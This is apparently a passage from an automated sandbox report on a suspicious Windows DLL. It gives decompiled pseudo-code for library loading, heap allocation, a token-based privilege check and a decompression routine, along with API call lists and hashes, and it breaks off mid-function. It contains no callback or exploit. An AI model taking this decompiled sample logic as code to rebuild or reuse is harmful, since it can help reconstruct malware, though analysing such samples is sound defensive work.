                                                                                                                                                                                                				_v8 = _t5;
                                                                                                                                                                                                				_push(_t5);
                                                                                                                                                                                                				if(_a4 != 0x7c3) {
                                                                                                                                                                                                					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t7 = GetModuleHandleA();
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(_t7 != 0) {
                                                                                                                                                                                                					_t10 = E1000E1B3(_t12, _t22, _t7); // executed
                                                                                                                                                                                                					_t25 = _t10;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E100085A3( &_v8);
                                                                                                                                                                                                				return _t25;
                                                                                                                                                                                                			}











                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA20), ref: 1000E220
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,1001BA20), ref: 1000E22D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4133054770-0
                                                                                                                                                                                                • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                                                                                                                                                                                • Instruction ID: 74ff8a95a41aeaeec01c10c3edac8cd294b9b37b9d7a58d21f84c2d18d0caf3a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BF08271700154ABF708DBA9EC8589AB3ECDB943D1710412AF505E3254DAB0EF4087A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000CD02(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                				CHAR* _v8;
                                                                                                                                                                                                				int _t28;
                                                                                                                                                                                                				signed int _t31;
                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                				signed int* _t41;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t41 = _a8;
                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                				if(_t41[1] > 0) {
                                                                                                                                                                                                					_t38 = 0;
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_t3 =  &(_t41[2]); // 0xe6840d8b
                                                                                                                                                                                                						_t34 =  *_t3;
                                                                                                                                                                                                						_t35 = 0;
                                                                                                                                                                                                						_a8 = 0;
                                                                                                                                                                                                						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                                                                                                                                                                                                							_v8 = _a4 + 0x24;
                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                                                                                                                                                                                                								_t14 =  &(_t41[2]); // 0xe6840d8b
                                                                                                                                                                                                								_t34 =  *_t14;
                                                                                                                                                                                                								if(_t28 == 0) {
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t35 = _a8 + 1;
                                                                                                                                                                                                								_a8 = _t35;
                                                                                                                                                                                                								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                                                                                                                                                                                                									continue;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                								}
                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							 *_t41 =  *_t41 |  *(_t34 + _t38);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						L8:
                                                                                                                                                                                                						_t31 = _t31 + 1;
                                                                                                                                                                                                						_t38 = _t38 + 0x10;
                                                                                                                                                                                                						_t20 =  &(_t41[1]); // 0x1374ff85
                                                                                                                                                                                                					} while (_t31 <  *_t20);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				Sleep(0xa);
                                                                                                                                                                                                				return 1;
                                                                                                                                                                                                			}











                                                                                                                                                                                                APIs
                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC4F,?,?), ref: 1000CD36
                                                                                                                                                                                                • Sleep.KERNELBASE(0000000A,00000000,?,?,?,1000AC4F,?,?), ref: 1000CD68
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Sleeplstrcmpi
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1261054337-0
                                                                                                                                                                                                • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                                                                                                                                                                                • Instruction ID: f37a54f2d194e92077bc8e4b7c436761f4679303faf6b7a6905cf7e87245eca0
                                                                                                                                                                                                • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 82018031600709AFEB14CF69C8C4D59BBE5FF843A8721C07AE5698B225D330E942DF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E10005E77() {
                                                                                                                                                                                                				intOrPtr _t3;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t3 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                                                                                                                                                                                                				ExitProcess(0);
                                                                                                                                                                                                			}





                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 10005E8E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                                                                                                                                                                                • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                                                                                                                                                                                                • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E100085D0() {
                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                                                                                                                                                                                				 *0x1001e768 = _t1;
                                                                                                                                                                                                				return _t1;
                                                                                                                                                                                                			}





                                                                                                                                                                                                APIs
                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F88), ref: 100085D9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                                                • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                                                                                                                                                                                • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E1000BAA4(void* __ecx, void* __esi) {
                                                                                                                                                                                                				intOrPtr* _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				short _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                				char _t37;
                                                                                                                                                                                                				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                                                				char _t45;
                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t37 = 0;
                                                                                                                                                                                                				_v28 = 0x500;
                                                                                                                                                                                                				_t45 = 0;
                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                				_t20 = E1000B988(__ecx);
                                                                                                                                                                                                				_v16 = _t20;
                                                                                                                                                                                                				if(_t20 != 0) {
                                                                                                                                                                                                					_push( &_v24);
                                                                                                                                                                                                					_t44 = 2;
                                                                                                                                                                                                					_t21 = E1000B9DA(_t44); // executed
                                                                                                                                                                                                					_t48 = _t21;
                                                                                                                                                                                                					_v20 = _t48;
                                                                                                                                                                                                					if(_t48 == 0) {
                                                                                                                                                                                                						L10:
                                                                                                                                                                                                						CloseHandle(_v16);
                                                                                                                                                                                                						if(_t48 != 0) {
                                                                                                                                                                                                							E100085FB( &_v20, _t37);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						return _t45;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push( &_v12);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0x220);
                                                                                                                                                                                                					_push(0x20);
                                                                                                                                                                                                					_push(2);
                                                                                                                                                                                                					_push( &_v32);
                                                                                                                                                                                                					_t29 =  *0x1001e68c; // 0x4d2fa40
                                                                                                                                                                                                					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if( *_t48 <= 0) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_t31 =  *0x1001e68c; // 0x4d2fa40
                                                                                                                                                                                                						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                                                					_t33 = _t9;
                                                                                                                                                                                                					_v8 = _t33;
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_push(_v12);
                                                                                                                                                                                                						_push( *_t33);
                                                                                                                                                                                                						_t34 =  *0x1001e68c; // 0x4d2fa40
                                                                                                                                                                                                						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t37 = _t37 + 1;
                                                                                                                                                                                                						_t33 = _v8 + 8;
                                                                                                                                                                                                						_v8 = _t33;
                                                                                                                                                                                                						if(_t37 <  *_t48) {
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t45 = 1;
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t20;
                                                                                                                                                                                                			}





















                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000B988: GetCurrentThread.KERNEL32 ref: 1000B99B
                                                                                                                                                                                                  • Part of subcall function 1000B988: OpenThreadToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9A2
                                                                                                                                                                                                  • Part of subcall function 1000B988: GetLastError.KERNEL32(?,?,1000BABE,74E5F500,10000000), ref: 1000B9A9
                                                                                                                                                                                                  • Part of subcall function 1000B988: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C2
                                                                                                                                                                                                  • Part of subcall function 1000B988: OpenProcessToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C9
                                                                                                                                                                                                  • Part of subcall function 1000B9DA: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74E5F500,00000000,10000000,00000000,00000000,?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9F5
                                                                                                                                                                                                  • Part of subcall function 1000B9DA: GetLastError.KERNEL32(?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9FC
                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,00000000,74E5F500,10000000), ref: 1000BB48
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Token$CurrentErrorLastOpenProcessThread$CloseHandleInformation
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1020899596-0
                                                                                                                                                                                                • Opcode ID: 7496030081f187c3be82d862b0638c4536d53a25532959bdc46a17bfd4f9878a
                                                                                                                                                                                                • Instruction ID: 879b9df3aaa00c0659358d6a91e28364aef497fa3115ff5a30bcbe7a213f7874
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7496030081f187c3be82d862b0638c4536d53a25532959bdc46a17bfd4f9878a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 22215E71A00619AFEB00DFA9DC85E9EB7F8FF44790B518069F641E7259D770EE018B50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E100085E5(long _a4) {
                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t2 = HeapAlloc( *0x1001e768, 8, _a4); // executed
                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                			}




                                                                                                                                                                                                0x100085f3
                                                                                                                                                                                                0x100085fa

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                • Opcode ID: 8fa3f0636157d6f724efeb9e6e061b1388aa9a5b26bf0cb6cb48d2cfaead2726
                                                                                                                                                                                                • Instruction ID: 98384dcc60fbf452174263320f9adba220b6aef63daea83b52f76a11741f2994
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fa3f0636157d6f724efeb9e6e061b1388aa9a5b26bf0cb6cb48d2cfaead2726
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EB09235084A1CBBFE821B81DD85A887F69EB08755F008010F608090B0CA72AA649B80
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                			E100153BF(void* __edi) {
                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                				unsigned int _t172;
                                                                                                                                                                                                				unsigned int _t173;
                                                                                                                                                                                                				signed int _t174;
                                                                                                                                                                                                				signed int _t176;
                                                                                                                                                                                                				signed int _t178;
                                                                                                                                                                                                				signed int _t179;
                                                                                                                                                                                                				signed int _t182;
                                                                                                                                                                                                				signed int _t184;
                                                                                                                                                                                                				unsigned int _t185;
                                                                                                                                                                                                				int _t186;
                                                                                                                                                                                                				int _t194;
                                                                                                                                                                                                				signed char _t200;
                                                                                                                                                                                                				signed int _t207;
                                                                                                                                                                                                				signed int _t208;
                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                				int _t210;
                                                                                                                                                                                                				int _t222;
                                                                                                                                                                                                				signed int _t227;
                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                				signed int _t251;
                                                                                                                                                                                                				signed char _t252;
                                                                                                                                                                                                				unsigned int _t253;
                                                                                                                                                                                                				signed char _t254;
                                                                                                                                                                                                				signed int* _t255;
                                                                                                                                                                                                				signed int _t258;
                                                                                                                                                                                                				signed int _t259;
                                                                                                                                                                                                				signed int _t260;
                                                                                                                                                                                                				signed int _t266;
                                                                                                                                                                                                				intOrPtr _t271;
                                                                                                                                                                                                				signed char _t278;
                                                                                                                                                                                                				signed int _t279;
                                                                                                                                                                                                				char* _t280;
                                                                                                                                                                                                				signed int _t282;
                                                                                                                                                                                                				signed char _t284;
                                                                                                                                                                                                				signed int _t287;
                                                                                                                                                                                                				signed int _t291;
                                                                                                                                                                                                				int _t292;
                                                                                                                                                                                                				int _t293;
                                                                                                                                                                                                				int _t296;
                                                                                                                                                                                                				int _t298;
                                                                                                                                                                                                				int _t302;
                                                                                                                                                                                                				signed int _t305;
                                                                                                                                                                                                				signed char _t311;
                                                                                                                                                                                                				signed char _t312;
                                                                                                                                                                                                				signed char _t315;
                                                                                                                                                                                                				signed char _t316;
                                                                                                                                                                                                				signed int _t318;
                                                                                                                                                                                                				int _t319;
                                                                                                                                                                                                				int _t320;
                                                                                                                                                                                                				signed char _t322;
                                                                                                                                                                                                				int _t324;
                                                                                                                                                                                                				int _t326;
                                                                                                                                                                                                				int _t330;
                                                                                                                                                                                                				signed int _t333;
                                                                                                                                                                                                				signed char _t336;
                                                                                                                                                                                                				signed char _t337;
                                                                                                                                                                                                				signed char _t339;
                                                                                                                                                                                                				int _t341;
                                                                                                                                                                                                				signed int _t347;
                                                                                                                                                                                                				int _t349;
                                                                                                                                                                                                				intOrPtr _t350;
                                                                                                                                                                                                				intOrPtr _t351;
                                                                                                                                                                                                				unsigned int _t356;
                                                                                                                                                                                                				unsigned int _t361;
                                                                                                                                                                                                				signed int _t364;
                                                                                                                                                                                                				signed int _t365;
                                                                                                                                                                                                				intOrPtr _t367;
                                                                                                                                                                                                				void* _t368;
                                                                                                                                                                                                				intOrPtr* _t380;
                                                                                                                                                                                                				void* _t381;
                                                                                                                                                                                                				intOrPtr* _t389;
                                                                                                                                                                                                				void* _t390;
                                                                                                                                                                                                				signed int _t395;
                                                                                                                                                                                                				void* _t396;
                                                                                                                                                                                                				signed int _t397;
                                                                                                                                                                                                				void* _t403;
                                                                                                                                                                                                				void* _t405;
                                                                                                                                                                                                				intOrPtr* _t412;
                                                                                                                                                                                                				void* _t413;
                                                                                                                                                                                                				signed int _t414;
                                                                                                                                                                                                				void* _t416;
                                                                                                                                                                                                				intOrPtr* _t423;
                                                                                                                                                                                                				void* _t424;
                                                                                                                                                                                                				unsigned int _t430;
                                                                                                                                                                                                				signed int _t431;
                                                                                                                                                                                                				void* _t434;
                                                                                                                                                                                                				signed int* _t435;
                                                                                                                                                                                                				void* _t439;
                                                                                                                                                                                                
                                                                                                                                                                                                				 *((intOrPtr*)(__edi + 0x56))();
                                                                                                                                                                                                				asm("pushfd");
                                                                                                                                                                                                				_t435 = _t434 - 0x40;
                                                                                                                                                                                                				asm("cld");
                                                                                                                                                                                                				_t395 = _t435[0x16];
                                                                                                                                                                                                				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
                                                                                                                                                                                                				_t164 =  *_t395;
                                                                                                                                                                                                				_t435[0xb] = _t164;
                                                                                                                                                                                                				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
                                                                                                                                                                                                				_t271 =  *((intOrPtr*)(_t395 + 0x10));
                                                                                                                                                                                                				_t251 =  *(_t395 + 0xc);
                                                                                                                                                                                                				_t435[0xf] = _t251;
                                                                                                                                                                                                				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
                                                                                                                                                                                                				_t435[4] = _t271 - 0x101 + _t251;
                                                                                                                                                                                                				_t435[2] =  *(_t367 + 0x4c);
                                                                                                                                                                                                				_t435[3] =  *(_t367 + 0x50);
                                                                                                                                                                                                				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
                                                                                                                                                                                                				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
                                                                                                                                                                                                				_t172 =  *(_t367 + 0x28);
                                                                                                                                                                                                				_t347 =  *(_t367 + 0x34);
                                                                                                                                                                                                				_t435[0xd] = _t172;
                                                                                                                                                                                                				_t435[0xc] =  *(_t367 + 0x30);
                                                                                                                                                                                                				_t435[0xe] = _t347;
                                                                                                                                                                                                				_t430 =  *(_t367 + 0x38);
                                                                                                                                                                                                				_t252 =  *(_t367 + 0x3c);
                                                                                                                                                                                                				_t396 = _t435[0xb];
                                                                                                                                                                                                				_t278 = _t435[5];
                                                                                                                                                                                                				if(_t278 > _t396) {
                                                                                                                                                                                                					L2:
                                                                                                                                                                                                					if((_t396 & 0x00000003) != 0) {
                                                                                                                                                                                                						_t396 = _t396 + 1;
                                                                                                                                                                                                						_t278 = _t252;
                                                                                                                                                                                                						_t252 = _t252 + 8;
                                                                                                                                                                                                						_t172 = 0 << _t278;
                                                                                                                                                                                                						_t430 = _t430 | _t172;
                                                                                                                                                                                                						goto L2;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t341 = _t278 + 0xb - _t396;
                                                                                                                                                                                                					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
                                                                                                                                                                                                					_t435 =  &(_t435[6]);
                                                                                                                                                                                                					_t278 = 0;
                                                                                                                                                                                                					_t396 =  &(_t435[7]);
                                                                                                                                                                                                					_t435[5] = _t396;
                                                                                                                                                                                                					L4:
                                                                                                                                                                                                					_t368 = _t435[0xf];
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_t439 =  *0x1001d040 - 2;
                                                                                                                                                                                                						if(_t439 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_t439 > 0) {
                                                                                                                                                                                                							do {
                                                                                                                                                                                                								if(_t252 <= 0xf) {
                                                                                                                                                                                                									asm("lodsw");
                                                                                                                                                                                                									_t322 = _t252;
                                                                                                                                                                                                									_t252 = _t252 + 0x10;
                                                                                                                                                                                                									_t430 = _t431 | 0 << _t322;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                									_t253 = _t252 - _t173;
                                                                                                                                                                                                									_t431 = _t430 >> _t173;
                                                                                                                                                                                                									if(_t173 == 0) {
                                                                                                                                                                                                										asm("stosb");
                                                                                                                                                                                                										goto L22;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t356 = _t173 >> 0x10;
                                                                                                                                                                                                									_t311 = _t173;
                                                                                                                                                                                                									if((_t173 & 0x00000010) == 0) {
                                                                                                                                                                                                										if((_t173 & 0x00000040) != 0) {
                                                                                                                                                                                                											L97:
                                                                                                                                                                                                											if((_t173 & 0x00000020) == 0) {
                                                                                                                                                                                                												_t280 = "invalid literal/length code";
                                                                                                                                                                                                												_t350 = 0x1a;
                                                                                                                                                                                                											} else {
                                                                                                                                                                                                												_t280 = 0;
                                                                                                                                                                                                												_t350 = 0xb;
                                                                                                                                                                                                											}
                                                                                                                                                                                                											L101:
                                                                                                                                                                                                											_t174 = _t435[0x16];
                                                                                                                                                                                                											if(_t280 != 0) {
                                                                                                                                                                                                												 *(_t174 + 0x18) = _t280;
                                                                                                                                                                                                											}
                                                                                                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
                                                                                                                                                                                                											goto L104;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
                                                                                                                                                                                                										continue;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t312 = _t311 & 0x0000000f;
                                                                                                                                                                                                									if(_t312 != 0) {
                                                                                                                                                                                                										if(_t253 < _t312) {
                                                                                                                                                                                                											asm("lodsw");
                                                                                                                                                                                                											_t339 = _t253;
                                                                                                                                                                                                											_t253 = _t253 + 0x10;
                                                                                                                                                                                                											_t431 = _t431 | 0 << _t339;
                                                                                                                                                                                                											_t312 = _t339;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t253 = _t253 - _t312;
                                                                                                                                                                                                										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
                                                                                                                                                                                                										_t431 = _t431 >> _t312;
                                                                                                                                                                                                										_t356 = _t356 + _t235;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t435[6] = _t356;
                                                                                                                                                                                                									if(_t253 <= 0xf) {
                                                                                                                                                                                                										asm("lodsw");
                                                                                                                                                                                                										_t337 = _t253;
                                                                                                                                                                                                										_t253 = _t253 + 0x10;
                                                                                                                                                                                                										_t431 = _t431 | 0 << _t337;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
                                                                                                                                                                                                									while(1) {
                                                                                                                                                                                                										_t361 = _t200 >> 0x10;
                                                                                                                                                                                                										_t253 = _t253 - _t200;
                                                                                                                                                                                                										_t431 = _t431 >> _t200;
                                                                                                                                                                                                										_t315 = _t200;
                                                                                                                                                                                                										if((_t200 & 0x00000010) != 0) {
                                                                                                                                                                                                											break;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										if((_t200 & 0x00000040) != 0) {
                                                                                                                                                                                                											L96:
                                                                                                                                                                                                											_t280 = "invalid distance code";
                                                                                                                                                                                                											_t350 = 0x1a;
                                                                                                                                                                                                											goto L101;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t316 = _t315 & 0x0000000f;
                                                                                                                                                                                                									if(_t316 == 0) {
                                                                                                                                                                                                										if(_t361 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                                                											L38:
                                                                                                                                                                                                											_t435[0xb] = _t396;
                                                                                                                                                                                                											_t207 = _t368 - _t435[0xa];
